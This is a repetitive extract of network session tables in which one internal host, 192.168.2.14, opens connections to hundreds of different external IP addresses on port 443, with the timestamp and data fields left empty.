                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19205192.168.2.1456640136.45.176.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19206192.168.2.1436052135.11.73.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19207192.168.2.1433122219.61.163.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19208192.168.2.1453800129.4.235.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19209192.168.2.1449834206.99.95.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19210192.168.2.145651470.198.35.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19211192.168.2.144674860.224.54.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19212192.168.2.1459312140.255.191.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19213192.168.2.1436436130.110.40.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19214192.168.2.1442376191.137.20.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19215192.168.2.144181085.125.109.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19216192.168.2.143785470.192.117.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19217192.168.2.145998871.221.63.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19218192.168.2.1458982166.160.159.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19219192.168.2.143950614.63.54.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19220192.168.2.1443372135.103.62.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19221192.168.2.143987085.26.93.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19222192.168.2.1442040106.62.43.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19223192.168.2.1448000142.137.216.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19224192.168.2.144655663.253.87.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19225192.168.2.145818873.23.254.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19226192.168.2.1452022173.105.57.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19227192.168.2.1450686210.214.28.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19228192.168.2.1448496151.94.242.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19229192.168.2.1452918126.224.240.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19230192.168.2.1440986105.152.243.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19231192.168.2.1457602118.10.17.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19232192.168.2.1452058125.119.208.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19233192.168.2.1442898160.226.224.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19234192.168.2.145139054.253.82.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19235192.168.2.1453658163.186.179.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19236192.168.2.1460008100.19.21.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19237192.168.2.1459320167.72.31.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19238192.168.2.1437302155.83.168.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19239192.168.2.14474921.77.77.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19240192.168.2.1433204107.91.115.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19241192.168.2.146080025.89.136.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19242192.168.2.145554636.113.165.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19243192.168.2.144603484.61.52.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19244192.168.2.1450052208.199.197.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19245192.168.2.1445864162.162.152.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19246192.168.2.1441544210.97.143.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19247192.168.2.143382681.165.33.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19248192.168.2.1439980114.43.17.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19249192.168.2.1448646141.254.254.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19250192.168.2.1456794170.149.203.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19251192.168.2.1449122113.66.43.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19252192.168.2.1456144174.81.70.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19253192.168.2.1444664156.96.238.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19254192.168.2.1432960219.231.192.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19255192.168.2.14579384.235.41.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19256192.168.2.144896047.239.190.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19257192.168.2.1454696159.238.86.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19258192.168.2.1448970118.6.90.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19259192.168.2.145414084.240.48.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19260192.168.2.1435282202.137.15.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19261192.168.2.1448578102.148.20.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19262192.168.2.144797646.140.138.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19263192.168.2.143800252.140.148.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19264192.168.2.1447454206.26.54.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19265192.168.2.1445322111.65.83.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19266192.168.2.1443230172.148.78.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19267192.168.2.1451200221.70.247.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19268192.168.2.143401295.62.116.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19269192.168.2.14562209.108.24.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19270192.168.2.1454320148.130.146.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19271192.168.2.1459888144.135.57.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19272192.168.2.1454288107.200.15.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19273192.168.2.145467858.124.56.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19274192.168.2.1454396152.77.7.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19275192.168.2.1450122140.228.59.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19276192.168.2.1450100109.251.254.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19277192.168.2.1438162174.74.166.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19278192.168.2.1455972119.199.222.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19279192.168.2.145983879.44.103.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19280192.168.2.1441538195.195.230.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19281192.168.2.143944417.93.163.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19282192.168.2.1440086182.180.216.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19283192.168.2.1460860158.182.119.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19284192.168.2.1443358204.85.113.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19285192.168.2.143289639.111.214.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19286192.168.2.145421882.23.156.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19287192.168.2.1445568139.219.180.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19288192.168.2.1439274106.66.103.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19289192.168.2.1434774192.45.132.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19290192.168.2.145123480.67.217.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19291192.168.2.1436612106.28.16.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19292192.168.2.1438818102.197.33.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19293192.168.2.1437930106.86.8.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19294192.168.2.144318477.253.223.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19295192.168.2.1454880160.218.164.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19296192.168.2.146032699.244.248.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19297192.168.2.1438294169.191.211.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19298192.168.2.144144058.122.226.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19299192.168.2.1456238202.31.150.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19300192.168.2.1439416105.39.204.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19301192.168.2.144789658.219.199.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19302192.168.2.143345649.168.123.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19303192.168.2.1434870159.179.94.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19304192.168.2.144939863.22.0.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19305192.168.2.145633875.83.5.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19306192.168.2.1459718175.210.158.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19307192.168.2.1459346208.55.179.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19308192.168.2.1438268169.215.98.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19309192.168.2.1439372168.56.10.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19310192.168.2.1458060118.196.187.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19311192.168.2.1433346143.122.133.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19312192.168.2.1442088186.208.241.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19313192.168.2.1449126198.192.246.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19314192.168.2.1457810154.188.243.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19315192.168.2.1451882128.213.228.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19316192.168.2.145066418.213.17.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19317192.168.2.14546109.28.0.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19318192.168.2.1452434136.52.153.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19319192.168.2.1441324207.143.50.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19320192.168.2.1457398184.21.48.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19321192.168.2.143749487.235.202.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19322192.168.2.1445628156.185.154.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19323192.168.2.144093450.127.50.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19324192.168.2.145699052.180.153.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19325192.168.2.1440016155.52.27.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19326192.168.2.1454532212.215.185.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19327192.168.2.143940088.16.228.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19328192.168.2.145222862.17.67.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19329192.168.2.145120059.179.112.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19330192.168.2.143495851.69.29.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19331192.168.2.1437862195.176.181.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19332192.168.2.1444780211.205.152.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19333192.168.2.1433964155.19.36.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19334192.168.2.145922894.223.98.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19335192.168.2.1441120206.198.21.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19336192.168.2.145768081.186.26.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19337192.168.2.143821286.226.104.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19338192.168.2.1447376162.185.195.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19339192.168.2.1442394179.220.98.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19340192.168.2.1455334216.125.237.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19341192.168.2.1437986153.195.235.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19342192.168.2.1441480143.175.65.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19343192.168.2.145781258.173.79.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19344192.168.2.1441364118.85.194.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19345192.168.2.1450998101.81.40.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19346192.168.2.1437390212.245.174.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19347192.168.2.144673640.148.125.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19348192.168.2.1441754147.254.243.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19349192.168.2.1447538211.181.43.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19350192.168.2.1459610221.175.67.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19351192.168.2.1452336159.209.136.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19352192.168.2.1436344149.188.120.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19353192.168.2.1436602221.213.72.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19354192.168.2.146097618.85.13.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19355192.168.2.1433710212.106.239.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19356192.168.2.145422673.123.165.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19357192.168.2.145365094.185.232.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19358192.168.2.14427629.214.146.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19359192.168.2.1457106203.13.56.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19360192.168.2.1435486120.221.7.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19361192.168.2.1457240190.113.9.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19362192.168.2.1460458178.118.69.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19363192.168.2.1442460173.38.10.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19364192.168.2.1443032192.219.189.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19365192.168.2.1436534203.3.241.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19366192.168.2.1455984118.189.187.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19367192.168.2.1459990106.207.232.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19368192.168.2.144863659.11.11.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19369192.168.2.1443918177.87.104.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19370192.168.2.1455022106.34.180.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19371192.168.2.145045296.251.225.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19372192.168.2.1442298212.153.175.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19373192.168.2.1449948168.207.102.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19374192.168.2.1433970125.145.46.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19375192.168.2.1449582135.243.128.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19376192.168.2.144705434.33.246.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19377192.168.2.1443872218.155.105.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19378192.168.2.1445396120.192.146.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19379192.168.2.1440274141.31.185.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19380192.168.2.145129643.140.63.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19381192.168.2.144906892.53.178.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19382192.168.2.144443661.123.127.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19383192.168.2.1456574200.220.211.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19384192.168.2.1458532216.208.114.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19385192.168.2.145832624.227.145.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19386192.168.2.145331287.97.11.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19387192.168.2.1452826116.139.112.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19388192.168.2.14476825.43.126.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19389192.168.2.1459350132.232.3.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19390192.168.2.144405657.197.101.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19391192.168.2.1437182113.59.211.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19392192.168.2.144331871.224.107.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19393192.168.2.1434854110.57.31.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19394192.168.2.143426213.98.63.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19395192.168.2.1441582179.213.236.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19396192.168.2.1459650164.29.137.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19397192.168.2.1459786122.17.110.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19398192.168.2.1449710146.79.164.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19399192.168.2.1438598152.41.183.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19400192.168.2.1438774192.128.239.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19401192.168.2.144130298.37.165.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19402192.168.2.145712667.83.175.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19403192.168.2.144124641.141.159.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19404192.168.2.1450174124.236.249.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19405192.168.2.1449942166.123.235.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19406192.168.2.1455188188.202.198.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19407192.168.2.1444662186.185.54.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19408192.168.2.1446526180.214.149.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19409192.168.2.1441842176.131.227.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19410192.168.2.1459248189.151.231.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19411192.168.2.1444394197.243.164.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19412192.168.2.1452594173.198.163.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19413192.168.2.1440100204.102.225.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19414192.168.2.1450482170.57.236.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19415192.168.2.14541861.4.47.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19416192.168.2.145785672.202.231.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19417192.168.2.1443978103.227.71.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19418192.168.2.1458292102.203.254.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19419192.168.2.14537201.172.197.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19420192.168.2.144878686.196.239.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19421192.168.2.1441294156.150.119.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19422192.168.2.144063691.201.40.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19423192.168.2.1451852179.138.197.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19424192.168.2.1439796165.17.178.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19425192.168.2.145171849.45.37.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
